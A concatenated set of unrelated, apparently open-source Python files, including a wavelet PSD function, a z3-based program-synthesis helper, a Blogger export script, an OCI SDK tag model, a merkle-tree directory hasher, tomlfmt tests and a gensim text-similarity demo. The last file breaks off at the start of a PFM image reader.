return (np.sqrt(np.pi / a)
* np.exp(-2j * np.pi * f * t0)
* np.exp(-np.pi ** 2 * (f - f0) ** 2 / a))
def sinegauss_PSD(f, t0, f0, Q):
"""Compute the PSD of the sine-gaussian function at frequency f
.. math::
PSD(f) = |H(f)|^2 + |H(-f)|^2
"""
a = (f0 * 1. / Q) ** 2
Pf = np.pi / a * np.exp(-2 * np.pi ** 2 * (f - f0) ** 2 / a)
Pmf = np.pi / a * np.exp(-2 * np.pi ** 2 * (-f - f0) ** 2 / a)
return Pf + Pmf
def wavelet_PSD(t, h, f0, Q=1.0):
"""Compute the wavelet PSD as a function of f0 and t
Parameters
----------
t : array_like
array of times, length N
h : array_like
array of observed values, length N
f0 : array_like
array of candidate frequencies, length Nf
Q : float
Q-parameter for wavelet
Returns
-------
PSD : ndarray
The 2-dimensional PSD, of shape (Nf, N), corresponding with
frequencies f0 and times t.
"""
t, h, f0 = map(np.asarray, (t, h, f0))
if (t.ndim != 1) or (t.shape != h.shape):
raise ValueError('t and h must be one dimensional and the same shape')
if f0.ndim != 1:
raise ValueError('f0 must be one dimensional')
Q = Q + np.zeros_like(f0)
f, H = FT_continuous(t, h)
W = np.conj(sinegauss_FT(f, 0, f0[:, None], Q[:, None]))
_, HW = IFT_continuous(f, H * W)
return abs(HW) ** 2
|
the-stack_106_15916
|
from z3 import *
import jry2.translator as translator
import random
def getId(type, id):
return type + str(id)
def declareVar(type, id, VarTable):
newVar = translator.DeclareVar(type, id)
# print "declareVar", id, newVar, type
VarTable[str(newVar)] = newVar
return newVar
def replaceFunctionCall(Term, functionCallDic, functionName, outputType, VarTable):
if not type(Term) == list:
if type(Term) == tuple:
return [[], str(Term[1])]
else:
return [[], Term]
resTerm = [[], []]
for term in Term:
if type(term) == list and term[0] == functionName:
newArguments = []
for arg in term[1:]:
subCall, subTerm = replaceFunctionCall(arg, functionCallDic, functionName, outputType, VarTable)
for call in subCall:
if call not in resTerm[0]:
resTerm[0].append(call)
newArguments.append(subTerm)
# print newArguments
if str(newArguments) in functionCallDic:
functionCallVar = functionCallDic[str(newArguments)][0]
resTerm[0].append(str(functionCallVar))
resTerm[1].append(str(functionCallVar))
else:
id = len(functionCallDic)
currentOutput = declareVar(outputType, "functionCall%d"%(id), VarTable)
functionCallDic[str(newArguments)] = [currentOutput, newArguments]
if str(currentOutput) not in resTerm[0]:
resTerm[0].append(str(currentOutput))
resTerm[0].append(str(currentOutput))
resTerm[1].append(str(currentOutput))
elif type(term) == list:
subCall, subTerm = replaceFunctionCall(term, functionCallDic, functionName, outputType, VarTable)
for call in subCall:
if call not in resTerm[0]:
resTerm[0].append(call)
resTerm[1].append(subTerm)
else:
resTerm[1].append(term)
return resTerm
def replaceCons(Cons, s1, s2):
if type(Cons) != list:
if Cons == s1:
return s2
return Cons
return list(map(lambda x: replaceCons(x, s1, s2), Cons))
def simplifyOperator(Operators):
simpleOperators = []
# print(Operators)
for operatorType in Operators:
isBool = operatorType[1] == 'Bool'
isInt = operatorType[1] == 'Int'
# print(operatorType)
for arg in operatorType[2]:
if arg != ['Bool']:
isBool = False
if arg != ['Int']:
isInt = False
if isBool:
continue
resultOperator = []
for operator in operatorType[0]:
if operator == '<' and '>' in resultOperator: continue
if operator == '>' and '<' in resultOperator: continue
if operator == '<=' and '>=' in resultOperator: continue
if operator == '>=' and '<=' in resultOperator: continue
resultOperator.append(operator)
simpleOperators.append([resultOperator] + operatorType[1:])
return simpleOperators
def replaceTerm(term, s, t):
resultTerm = []
if term == s:
return t
if type(term) != list:
return term
for subTerm in term:
resultTerm.append(replaceTerm(subTerm, s, t))
return resultTerm
def dfsGetPossibleValueCons(currentSet, functionCalls, Args, VarTable, currentFunctionCall, ReplacedCons):
if len(functionCalls) == 0:
spec = "\n".join(list(map(lambda x: "(assert %s)"%(translator.toString(x[1:])), ReplacedCons)))
result = parse_smt2_string(spec, decls=VarTable)
return [Not(And(result))]
functionVar, functionArgs = functionCalls[0]
if str(functionVar) not in currentFunctionCall:
return dfsGetPossibleValueCons(currentSet, functionCalls[1:], Args, VarTable, currentFunctionCall, ReplacedCons)
result = []
for value in currentSet:
newTerm = value
for i in range(len(Args)):
newTerm = replaceTerm(newTerm, Args[i][0], functionArgs[i])
result += dfsGetPossibleValueCons(currentSet, functionCalls[1:], Args, VarTable, currentFunctionCall,
list(map(lambda x: replaceTerm(x, str(functionVar), newTerm), ReplacedCons)))
return result
def isValueSetFull(currentSet, functionCallDic, ArgumentDict, VarTable, ReplacedConsSet):
solver = Solver()
functionCallInfo = [functionCallDic[i] for i in functionCallDic]
allCons = []
for ReplacedCons in ReplacedConsSet:
allCons.append(And(dfsGetPossibleValueCons(currentSet, functionCallInfo, ArgumentDict, VarTable,
ReplacedCons[0], ReplacedCons[1])))
solver.add(Or(allCons))
# print(solver)
# print(solver.check())
return solver.check() == unsat
def simplifyResultSet(resultSet, superSet, functionCallDic, ArgumentDict, VarTable, ReplacedConsSet):
#print(len(resultSet), len(superSet))
if isValueSetFull(superSet, functionCallDic, ArgumentDict, VarTable, ReplacedConsSet):
return []
if len(resultSet) == 1:
return resultSet
middle = len(resultSet) // 2
leftSet = resultSet[: middle]
rightSet = resultSet[middle:]
left = simplifyResultSet(leftSet, superSet + rightSet, functionCallDic, ArgumentDict, VarTable, ReplacedConsSet)
right = simplifyResultSet(rightSet, superSet + left, functionCallDic, ArgumentDict, VarTable, ReplacedConsSet)
return left + right
def getConsSet(ConsInfo):
functionCallDic = {}
functionCallId = 1
loc = [0]
consSet =[[[],[]]]
# pprint.pprint(ConsInfo)
for consInfo in ConsInfo:
for functionName in consInfo[0]:
if not functionName in functionCallDic:
functionCallDic[functionName] = functionCallId
loc.append(functionCallId)
consSet.append([[functionName], []])
functionCallId += 1
for functionCalls, Cons in ConsInfo:
location = 0
if len(functionCalls) > 0:
location = loc[functionCallDic[functionCalls[0]]]
for functionCall in functionCalls:
where = loc[functionCallDic[functionCall]]
if where != location:
consSet[location][0].extend(consSet[where][0])
consSet[location][1].extend(consSet[where][1])
for functionName in consSet[where][0]:
loc[functionCallDic[functionName]] = location
consSet[where] = [[], []]
consSet[location][1].append(Cons)
result = []
for cons in consSet:
if len(cons[1]) > 0:
result.append(cons)
return result
def chcekMerge(operator, lTerm, rTerm):
if operator in ['mod', 'div']:
if type(rTerm) != str:
return False
try:
int(rTerm)
except:
return False
return True
return True
class ValueSet:
def __init__(self, argVarTable, Samples, Operators):
self.VarTable = argVarTable
self.Samples = Samples
self.Operators = Operators
self.hashTable = {}
self.Value = [[]]
def get(self, depth):
while len(self.Value) <= depth:
self.extendValue()
return self.Value[depth]
def addNewValue(self, var, depth):
resultVar = self.VarTable["__result"]
spec = "(assert (= %s %s))"%(str(resultVar), translator.toString(var))
result = parse_smt2_string(spec, decls=self.VarTable)
solver = Solver()
solver.add(result)
sampleOutput = []
for sample in self.Samples:
solver.push()
for arg in self.VarTable:
if arg in sample:
solver.add(self.VarTable[arg] == sample[arg])
solver.check()
model = solver.model()
sampleOutput.append(model[resultVar].as_long())
solver.pop()
hashIndex = str(sampleOutput)
if hashIndex not in self.hashTable:
self.hashTable[hashIndex] = []
else:
for otherVar in self.hashTable[hashIndex]:
solver.push()
spec = "(assert (not (= %s %s)))"%(str(resultVar), translator.toString(otherVar))
solver.add(parse_smt2_string(spec, decls=self.VarTable))
if solver.check() == unsat:
return False
solver.pop()
#print(var)
self.hashTable[hashIndex].append(var)
self.Value[depth].append(var)
return True
def extendValue(self):
depth = len(self.Value)
self.Value.append([])
for operatorType in self.Operators:
resultType = operatorType[1]
argument = operatorType[2]
if len(argument) != 2 or resultType != 'Int': continue
for lsize in range(depth):
for rsize in range(depth - lsize):
for operator in operatorType[0]:
for lTerm in self.Value[lsize]:
for rTerm in self.Value[rsize]:
if not chcekMerge(operator, lTerm, rTerm): continue
self.addNewValue([operator, lTerm, rTerm], depth)
def getPossibleValue(Operators, Expr, Terminals):
SynFunExpr, VarTable, FunDefMap, Constraints = translator.ReadQuery(Expr)
returnType = SynFunExpr[3]
functionCallDic = {}
ReplacedConsInfo = []
for i in range(len(Constraints)):
ReplacedConsInfo.append(replaceFunctionCall(Constraints[i], functionCallDic, SynFunExpr[1], SynFunExpr[3], VarTable))
ReplacedConsSet = getConsSet(ReplacedConsInfo)
# pprint.pprint(ReplacedConsSet)
resultSet = []
argVarTable = {}
for arg in SynFunExpr[2]:
declareVar(arg[1], arg[0], argVarTable)
Samples = []
sampleNum = 30
for _ in range(sampleNum):
sample = {}
for arg in SynFunExpr[2]:
value = False
if arg[1] == 'Bool':
value = random.randint(0, 1) == 0
else:
value = random.randint(0, 100)
sample[arg[0]] = value
Samples.append(sample)
Value = ValueSet(argVarTable, Samples, Operators)
if returnType == 'Bool':
resultSet = ['true', 'false']
else:
depth = 0
argVarTable["__result"] = Int("__result")
for terminal in Terminals['Int']:
Value.addNewValue(terminal, depth)
#print(Value)
while True:
resultSet += Value.get(depth)
#print(resultSet)
if isValueSetFull(resultSet, functionCallDic, SynFunExpr[2], VarTable, ReplacedConsSet):
break
depth += 1
resultSet = simplifyResultSet(resultSet, [], functionCallDic, SynFunExpr[2], VarTable, ReplacedConsSet)
return resultSet, Value
def findPossibleValue(bmExpr):
SynFunExpr = []
StartSym = 'My-Start-Symbol' # virtual starting symbol
for expr in bmExpr:
if len(expr) == 0:
continue
elif expr[0] == 'synth-fun':
SynFunExpr = expr
FuncDefine = ['define-fun'] + SynFunExpr[1:4] # copy function signature
Productions = {StartSym: []}
ReturnType = SynFunExpr[3]
Type = {StartSym: SynFunExpr[3]} # set starting symbol's return type
Terminals = {'Int': [], 'Bool': []}
Operators = []
for NonTerm in SynFunExpr[4]: # SynFunExpr[4] is the production rule
NTName = NonTerm[0]
NTType = NonTerm[1]
assert NTType in ['Int', 'Bool']
if NTType == Type[StartSym]:
Productions[StartSym].append(NTName)
Type[NTName] = NTType
# Productions[NTName] = NonTerm[2]
Productions[NTName] = []
for NT in NonTerm[2]:
if type(NT) == tuple:
Productions[NTName].append(str(NT[1])) # deal with ('Int',0). You can also utilize type information, but you will suffer from these tuples.
else:
Productions[NTName].append(NT)
operatorTable = {}
for NonTerm in SynFunExpr[4]:
for NT in NonTerm[2]:
current = NT
if type(NT) == tuple:
current = str(NT[1])
if type(current) == str:
if current not in Type and current not in Terminals[NonTerm[1]]:
Terminals[NonTerm[1]].append(current)
else:
operatorArgs = []
for i in NT[1:]:
if i in Type:
operatorArgs.append([Type[i]])
else:
operatorArgs.append(i)
operatorStr = str([NonTerm[1], operatorArgs])
if operatorStr in operatorTable:
operatorLoc = operatorTable[operatorStr]
Operators[operatorLoc][0].append(NT[0])
else:
operator = [[NT[0]], NonTerm[1]]
operator.append(operatorArgs)
operatorTable[operatorStr] = len(Operators)
Operators.append(operator)
Operators = simplifyOperator(Operators)
possibleValue, _ = getPossibleValue(Operators, bmExpr, Terminals)
return possibleValue
|
the-stack_106_15917
|
#!/usr/bin/env python3
#
# Consolidate all the raw Blogger JSON files into a single, simplified JSON file.
#
from collections import OrderedDict
import html
import io
import json
import sys
import lxml.etree as ET
import lxml.html
import re
import feeds
import util
posts = feeds.json_post_entries_list()
output = []
for jpost in posts:
npost = OrderedDict()
output.append(npost)
npost["postid"] = re.match(r"tag:blogger.com,1999:blog-27481991.post-(\d+)$", jpost["id"]["$t"]).group(1)
assert jpost["title"]["type"] == "text"
npost["title"] = jpost["title"]["$t"]
(link,) = [x for x in jpost["link"] if x["rel"] == "alternate"]
npost["title_formatted"] = link["title"]
m = re.match(r"http://thearchdruidreport\.blogspot\.com/(20../../.*\.html)$", link["href"])
url = "https://thearchdruidreport.blogspot.com/" + m.group(1)
npost["url"] = url
npost["published"] = jpost["published"]["$t"] # e.g.: 2017-03-08T13:28:00.001-08:00
npost["updated"] = jpost["updated"]["$t"] # e.g.: 2017-03-08T13:32:19.336-08:00
assert jpost["content"]["type"] == "html"
npost["content"] = jpost["content"]["$t"]
npost["comments"] = []
for jcomment in feeds.comments_json(npost["postid"]):
ncomment = OrderedDict()
npost["comments"].append(ncomment)
ncomment["commentid"] = re.match(r"tag:blogger.com,1999:blog-27481991.post-(\d+)$", jcomment["id"]["$t"]).group(1)
(author,) = jcomment["author"]
ncomment["author"] = author["name"]["$t"]
ncomment["profile"] = author["uri"]["$t"]
avatar_url = author["gd$image"]["src"]
avatar_size = (int(author["gd$image"]["width"]), int(author["gd$image"]["height"]))
small_avatar = avatar_size[0] < 30 and avatar_size[1] < 30
if small_avatar:
if avatar_size == (16, 16) and avatar_url == "http://img1.blogblog.com/img/b16-rounded.gif":
ncomment["avatar"] = {"type": "blogger"}
elif avatar_size == (16, 16) and avatar_url == "http://img1.blogblog.com/img/openid16-rounded.gif":
ncomment["avatar"] = {"type": "openid"}
else:
raise RuntimeError("Invalid avatar info on comment (%s/%s, %s, %s)" % (
npost["postid"], ncomment["commentid"], avatar_url, avatar_size))
else:
ncomment["avatar"] = {"type": "url", "size": avatar_size, "url": avatar_url}
ncomment["published"] = jcomment["published"]["$t"]
ncomment["updated"] = jcomment["updated"]["$t"]
(display_time,) = [p for p in jcomment["gd$extendedProperty"] if p["name"] == "blogger.displayTime"]
ncomment["display_time"] = display_time["value"]
ncomment["comment_removed"] = (
len([p for p in jcomment["gd$extendedProperty"] if
(p["name"], p["value"]) == ("blogger.contentRemoved", "true")]) > 0)
related = [x for x in jcomment["link"] if x["rel"] == "related"]
if len(related) > 0:
(related,) = related
related = re.match(r"http://www\.blogger\.com/feeds/27481991/\d+/comments/default/(\d+)\?v=2$", related["href"])
ncomment["in_reply_to"] = related.group(1)
else:
ncomment["in_reply_to"] = None
ncomment["title"] = jcomment["title"]["$t"]
assert jcomment["content"]["type"] == "html"
ncomment["content"] = jcomment["content"]["$t"]
#html_parser = ET.HTMLParser()
#html = ET.HTML(content)
# doc = ET.parse(io.StringIO(content), html_parser)
# print(type(doc))
#print(ET.tostring(html))
#e = lxml.html.fragment_fromstring(content, create_parent="p")
#print(e)
#break
util.set_file_text("blog.json", json.dumps(output, indent=2))
|
the-stack_106_15918
|
import numpy as py
print("Input: ",end="")
arr = py.array(input().split()).astype(int)
def count(arr, low, high):
while high >= low:
mid = (high + low)//2
if (arr[mid] == 1 and (mid == 0 or arr[mid - 1] == 0)):
return mid
if arr[mid]==1:
high = mid-1
else:
low = mid+1
return -1
print("Output:",count(arr, 0, len(arr)-1))
|
the-stack_106_15922
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class BaseTag(object):
"""
Represents the association of an object to a term. Tags are immutable.
"""
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "CREATING"
LIFECYCLE_STATE_CREATING = "CREATING"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "ACTIVE"
LIFECYCLE_STATE_ACTIVE = "ACTIVE"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "INACTIVE"
LIFECYCLE_STATE_INACTIVE = "INACTIVE"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "UPDATING"
LIFECYCLE_STATE_UPDATING = "UPDATING"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "DELETING"
LIFECYCLE_STATE_DELETING = "DELETING"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "DELETED"
LIFECYCLE_STATE_DELETED = "DELETED"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "FAILED"
LIFECYCLE_STATE_FAILED = "FAILED"
#: A constant which can be used with the lifecycle_state property of a BaseTag.
#: This constant has a value of "MOVING"
LIFECYCLE_STATE_MOVING = "MOVING"
def __init__(self, **kwargs):
"""
Initializes a new BaseTag object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param key:
The value to assign to the key property of this BaseTag.
:type key: str
:param name:
The value to assign to the name property of this BaseTag.
:type name: str
:param term_key:
The value to assign to the term_key property of this BaseTag.
:type term_key: str
:param term_path:
The value to assign to the term_path property of this BaseTag.
:type term_path: str
:param term_description:
The value to assign to the term_description property of this BaseTag.
:type term_description: str
:param lifecycle_state:
The value to assign to the lifecycle_state property of this BaseTag.
Allowed values for this property are: "CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "MOVING"
:type lifecycle_state: str
:param time_created:
The value to assign to the time_created property of this BaseTag.
:type time_created: datetime
:param created_by_id:
The value to assign to the created_by_id property of this BaseTag.
:type created_by_id: str
:param uri:
The value to assign to the uri property of this BaseTag.
:type uri: str
"""
self.swagger_types = {
'key': 'str',
'name': 'str',
'term_key': 'str',
'term_path': 'str',
'term_description': 'str',
'lifecycle_state': 'str',
'time_created': 'datetime',
'created_by_id': 'str',
'uri': 'str'
}
self.attribute_map = {
'key': 'key',
'name': 'name',
'term_key': 'termKey',
'term_path': 'termPath',
'term_description': 'termDescription',
'lifecycle_state': 'lifecycleState',
'time_created': 'timeCreated',
'created_by_id': 'createdById',
'uri': 'uri'
}
self._key = None
self._name = None
self._term_key = None
self._term_path = None
self._term_description = None
self._lifecycle_state = None
self._time_created = None
self._created_by_id = None
self._uri = None
@property
def key(self):
"""
**[Required]** Gets the key of this BaseTag.
Unique tag key that is immutable.
:return: The key of this BaseTag.
:rtype: str
"""
return self._key
@key.setter
def key(self, key):
"""
Sets the key of this BaseTag.
Unique tag key that is immutable.
:param key: The key of this BaseTag.
:type: str
"""
self._key = key
@property
def name(self):
"""
Gets the name of this BaseTag.
Name of the tag which matches the term name.
:return: The name of this BaseTag.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this BaseTag.
Name of the tag which matches the term name.
:param name: The name of this BaseTag.
:type: str
"""
self._name = name
@property
def term_key(self):
"""
Gets the term_key of this BaseTag.
Unique key of the related term.
:return: The term_key of this BaseTag.
:rtype: str
"""
return self._term_key
@term_key.setter
def term_key(self, term_key):
"""
Sets the term_key of this BaseTag.
Unique key of the related term.
:param term_key: The term_key of this BaseTag.
:type: str
"""
self._term_key = term_key
@property
def term_path(self):
"""
Gets the term_path of this BaseTag.
Path of the related term.
:return: The term_path of this BaseTag.
:rtype: str
"""
return self._term_path
@term_path.setter
def term_path(self, term_path):
"""
Sets the term_path of this BaseTag.
Path of the related term.
:param term_path: The term_path of this BaseTag.
:type: str
"""
self._term_path = term_path
@property
def term_description(self):
"""
Gets the term_description of this BaseTag.
Description of the related term.
:return: The term_description of this BaseTag.
:rtype: str
"""
return self._term_description
@term_description.setter
def term_description(self, term_description):
"""
Sets the term_description of this BaseTag.
Description of the related term.
:param term_description: The term_description of this BaseTag.
:type: str
"""
self._term_description = term_description
@property
def lifecycle_state(self):
"""
Gets the lifecycle_state of this BaseTag.
The current state of the tag.
Allowed values for this property are: "CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "MOVING"
:return: The lifecycle_state of this BaseTag.
:rtype: str
"""
return self._lifecycle_state
@lifecycle_state.setter
def lifecycle_state(self, lifecycle_state):
"""
Sets the lifecycle_state of this BaseTag.
The current state of the tag.
:param lifecycle_state: The lifecycle_state of this BaseTag.
:type: str
"""
allowed_values = ["CREATING", "ACTIVE", "INACTIVE", "UPDATING", "DELETING", "DELETED", "FAILED", "MOVING"]
if not value_allowed_none_or_none_sentinel(lifecycle_state, allowed_values):
raise ValueError(
"Invalid value for `lifecycle_state`, must be None or one of {0}"
.format(allowed_values)
)
self._lifecycle_state = lifecycle_state
@property
def time_created(self):
"""
Gets the time_created of this BaseTag.
The date and time the tag was created, in the format defined by `RFC3339`__.
Example: `2019-03-25T21:10:29.600Z`
__ https://tools.ietf.org/html/rfc3339
:return: The time_created of this BaseTag.
:rtype: datetime
"""
return self._time_created
@time_created.setter
def time_created(self, time_created):
"""
Sets the time_created of this BaseTag.
The date and time the tag was created, in the format defined by `RFC3339`__.
Example: `2019-03-25T21:10:29.600Z`
__ https://tools.ietf.org/html/rfc3339
:param time_created: The time_created of this BaseTag.
:type: datetime
"""
self._time_created = time_created
@property
def created_by_id(self):
"""
Gets the created_by_id of this BaseTag.
OCID of the user who created the tag.
:return: The created_by_id of this BaseTag.
:rtype: str
"""
return self._created_by_id
@created_by_id.setter
def created_by_id(self, created_by_id):
"""
Sets the created_by_id of this BaseTag.
OCID of the user who created the tag.
:param created_by_id: The created_by_id of this BaseTag.
:type: str
"""
self._created_by_id = created_by_id
@property
def uri(self):
"""
Gets the uri of this BaseTag.
URI to the tag instance in the API.
:return: The uri of this BaseTag.
:rtype: str
"""
return self._uri
@uri.setter
def uri(self, uri):
"""
Sets the uri of this BaseTag.
URI to the tag instance in the API.
:param uri: The uri of this BaseTag.
:type: str
"""
self._uri = uri
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
the-stack_106_15924
|
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
import os
import json
import hashlib
from datetime import datetime
from os import listdir
from os.path import isfile, join
from collections import deque
HASH_FILE_CHUNK_SIZE = 65536
HASH_ALGORITHM = "sha512"
''' Create a merkle tree for the given directory path
The directory would typically represent a project directory'''
def create_merkletree(file_or_folder_path, exclude_function):
root = DirTreeNode("", "Directory",
datetime.fromtimestamp(os.path.getmtime(file_or_folder_path)).isoformat())
if os.path.isdir(file_or_folder_path):
folder_path = file_or_folder_path
_create_merkletree_helper(folder_path, root, exclude_function)
else:
file_path = file_or_folder_path
file_node = DirTreeNode(file_path,
"File",
datetime.fromtimestamp(os.path.getmtime(file_path)).isoformat())
hexdigest_hash, bytehash = _get_hash(os.path.normpath(file_path),
file_path,
"File")
if hexdigest_hash and bytehash:
file_node.add_hash(hexdigest_hash, bytehash)
root.add_child(file_node)
_populate_hashes(root)
return root
''' Populate hashes for directory nodes
by hashing the hashes of child nodes under them'''
def _populate_hashes(rootNode):
if (rootNode.is_file()):
return rootNode.bytehash
h = hashlib.new(HASH_ALGORITHM)
for child in rootNode.children:
if (child.is_file()):
h.update(child.bytehash)
else:
h.update(_populate_hashes(child))
rootNode.bytehash = h.digest()
rootNode.hexdigest_hash = h.hexdigest()
return h.digest()
''' Create a merkle tree for the given directory path
:param projectDir: Directory for which to create a tree.
:param rootNode: Root node .
Walks the directory and create a dirTree '''
def _create_merkletree_helper(projectDir, rootNode, exclude_function):
for f in sorted(listdir(projectDir)):
path = os.path.normpath(join(projectDir, f))
if not exclude_function(path):
if isfile(join(projectDir, f)):
newNode = DirTreeNode(f, "File", datetime.fromtimestamp(os.path.getmtime(path)).isoformat())
hexdigest_hash, bytehash = _get_hash(path, f, "File")
if hexdigest_hash and bytehash:
newNode.add_hash(hexdigest_hash, bytehash)
rootNode.add_child(newNode)
else:
newNode = DirTreeNode(f, "Directory", datetime.fromtimestamp(os.path.getmtime(path)).isoformat())
rootNode.add_child(newNode)
_create_merkletree_helper(path, newNode, exclude_function)
def _get_hash(filePath, name, file_type):
h = hashlib.new(HASH_ALGORITHM)
if not os.access(filePath, os.R_OK):
print(filePath, os.R_ok)
print("Cannot access file, so excluded from snapshot: {}".format(filePath))
return (None, None)
with open(filePath, 'rb') as f:
while True:
data = f.read(HASH_FILE_CHUNK_SIZE)
if not data:
break
h.update(data)
h.update(name.encode('utf-8'))
h.update(file_type.encode('utf-8'))
return (h.hexdigest(), h.digest())
''' We compute both hexdigest and digest for hashes.
digest (bytes) is used so that we can compute the bytehash of a parent directory based on bytehash of its children
hexdigest is used so that we can serialize the tree using json'''
class DirTreeNode(object):
def __init__(self, name=None, file_type=None, timestamp=None, hexdigest_hash=None, bytehash=None):
self.file_type = file_type
self.name = name
self.timestamp = timestamp
self.children = []
self.hexdigest_hash = hexdigest_hash
self.bytehash = bytehash
def load_children_from_dict(self, node_dict):
if (len(node_dict.items()) == 0):
return
self.name = node_dict['name']
self.file_type = node_dict['type']
self.hexdigest_hash = node_dict['hash']
self.timestamp = node_dict['timestamp']
for child_name, child in node_dict['children'].items():
node = DirTreeNode()
node.load_children_from_dict(child)
self.add_child(node)
return self
def load_children_from_json(self, node_dict):
self.name = node_dict['name']
self.file_type = node_dict['type']
self.hexdigest_hash = node_dict['hash']
self.timestamp = node_dict['timestamp']
for child in node_dict['children']:
node = DirTreeNode()
node.load_children_from_json(child)
self.add_child(node)
return self
def load_object_from_dict(self, node_dict):
self.load_children_from_dict(node_dict)
def load_root_object_from_json_string(self, jsondata):
node_dict = json.loads(jsondata)
self.load_children_from_json(node_dict)
def add_hash(self, hexdigest_hash, bytehash):
self.hexdigest_hash = hexdigest_hash
self.bytehash = bytehash
def add_child(self, node):
self.children.append(node)
def is_file(self):
return self.file_type == "File"
''' Only for debugging purposes'''
def print_tree(self):
queue = deque()
print("Name: " + self.name)
print("Type: " + self.file_type)
for child in self.children:
print(' ' + child.name)
queue.append(child)
for i in queue:
i.print_tree()
''' Serialize merkle tree.
Serialize all fields except digest (bytes)
'''
class DirTreeJsonEncoder(json.JSONEncoder):
def default(self, obj):
if not isinstance(obj, DirTreeNode):
return super(DirTreeJsonEncoder, self).default(obj)
dict = obj.__dict__
dict.pop("bytehash", None)
dict['type'] = dict.pop('file_type')
dict['hash'] = dict.pop('hexdigest_hash')
return dict
class DirTreeJsonEncoderV2(json.JSONEncoder):
def default(self, obj):
if not isinstance(obj, DirTreeNode):
return super(DirTreeJsonEncoder, self).default(obj)
dict = obj.__dict__
dict.pop("bytehash", None)
if 'file_type' in dict:
dict['type'] = dict.pop('file_type')
if 'hexdigest_hash' in dict:
dict['hash'] = dict.pop('hexdigest_hash')
if isinstance(dict['children'], list):
dict['children'] = {x.name: x for x in dict['children']}
return dict
|
the-stack_106_15929
|
# !/usr/bin/env python3
import jieba
from gensim import corpora, models, similarities
# choice_item = [
# '不方便,在工作,稍等一会, 我不是很感兴趣, 能不能等会再打','方便, 好,可以聊一下,方便,感兴趣,挺好的,有什么事','不知道你说的啥']
choice_item = ['不方便','在工作','稍等一会','我不是很感兴趣', '能不能等会再打','方便', '好','可以聊一下','方便','感兴趣','挺好的','有什么事','不知道你说的啥']
choice_cut = []
for i in choice_item:
data1 = ''
this_data = jieba.cut(i)
for item in this_data:
data1 += item + ' '
choice_cut.append(data1)
docs = choice_cut
tall = [ [w1 for w1 in doc.split()] for doc in docs]
dictionary = corpora.Dictionary(tall)
corpus = [dictionary.doc2bow(text) for text in tall]
tfidf = models.TfidfModel(corpus)
print(tfidf)
num = len(dictionary.token2id.keys())
index = similarities.SparseMatrixSimilarity(tfidf[corpus], num_features=num)
while True:
choice_input = input('请问您现在方便吗?\n')
in_data = jieba.cut(choice_input)
new_doc = ''
for d in in_data:
new_doc += d + ' '
new_vec = dictionary.doc2bow(new_doc.split())
sim = index[tfidf[new_vec]]
postion = sim.argsort()[-1]
print(choice_item[postion])
print('\n')
|
the-stack_106_15931
|
from unittest import mock
import os
import pytest
import tomlfmt
here = os.path.dirname(__file__)
pyproject_toml = os.path.join(os.path.dirname(here), "pyproject.toml")
@pytest.fixture
def no_write():
"""utility for verifying that no files are written"""
def open_no_write(path, mode="r"):
assert mode == "r"
return open(path, mode)
with mock.patch.object(tomlfmt, "open", open_no_write):
yield
def test_tomlfmt(capsys, no_write):
tomlfmt.main([pyproject_toml])
out, err = capsys.readouterr()
assert out == open(pyproject_toml).read()
def test_no_files():
with pytest.raises(ValueError):
tomlfmt.format()
def test_inplace(capsys, tmpdir):
path = tmpdir.join("test.toml")
with path.open("w") as w:
with open(os.path.join(here, "test.toml")) as r:
w.write(r.read())
tomlfmt.format(str(path), inplace=True)
out, err = capsys.readouterr()
assert "✅" in err
assert out == ""
with path.open("r") as f:
result = f.read()
with open(os.path.join(here, "test.good.toml")) as f:
expected = f.read()
assert result == expected
def test_no_change_no_write(capsys, tmpdir, no_write):
path = tmpdir.join("test.toml")
with path.open("w") as w:
with open(os.path.join(here, "test.good.toml")) as r:
w.write(r.read())
tomlfmt.format(str(path), inplace=True)
out, err = capsys.readouterr()
assert "🎉" in err
assert out == ""
with path.open("r") as f:
result = f.read()
with open(os.path.join(here, "test.good.toml")) as f:
expected = f.read()
assert result == expected
def test_no_write_bad(capsys, no_write):
tomlfmt.format(__file__, inplace=True)
out, err = capsys.readouterr()
assert "❌" in err
assert out == ""
def test_no_out_bad(capsys, no_write):
tomlfmt.format(__file__, inplace=True)
out, err = capsys.readouterr()
assert out == ""
assert "❌" in err
|
the-stack_106_15932
|
import numpy as np
from matplotlib import pyplot as plt
import EmotionUtils
import tensorflow as tf
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string("data_dir",\
"EmotionDetector/",\
"Path to data files")
images = []
images = EmotionUtils.read_data(FLAGS.data_dir)
train_images = images[0]
train_labels = images[1]
valid_images = images[2]
valid_labels = images[3]
test_images = images[4]
print ("train images shape = ",train_images.shape)
print ("test labels shape = ",test_images.shape)
image_0 = train_images[0]
label_0 = train_labels[0]
print ("image_0 shape = ",image_0.shape)
print ("label set = ",label_0)
image_0 = np.resize(image_0,(48,48))
plt.imshow(image_0, cmap='Greys_r')
plt.show()
|
the-stack_106_15933
|
# -*- coding: UTF-8 -*-
import numpy as np
import sys
def readPFM(fpath, expected_identifier="Pf"):
# PFM format definition: http://netpbm.sourceforge.net/doc/pfm.html
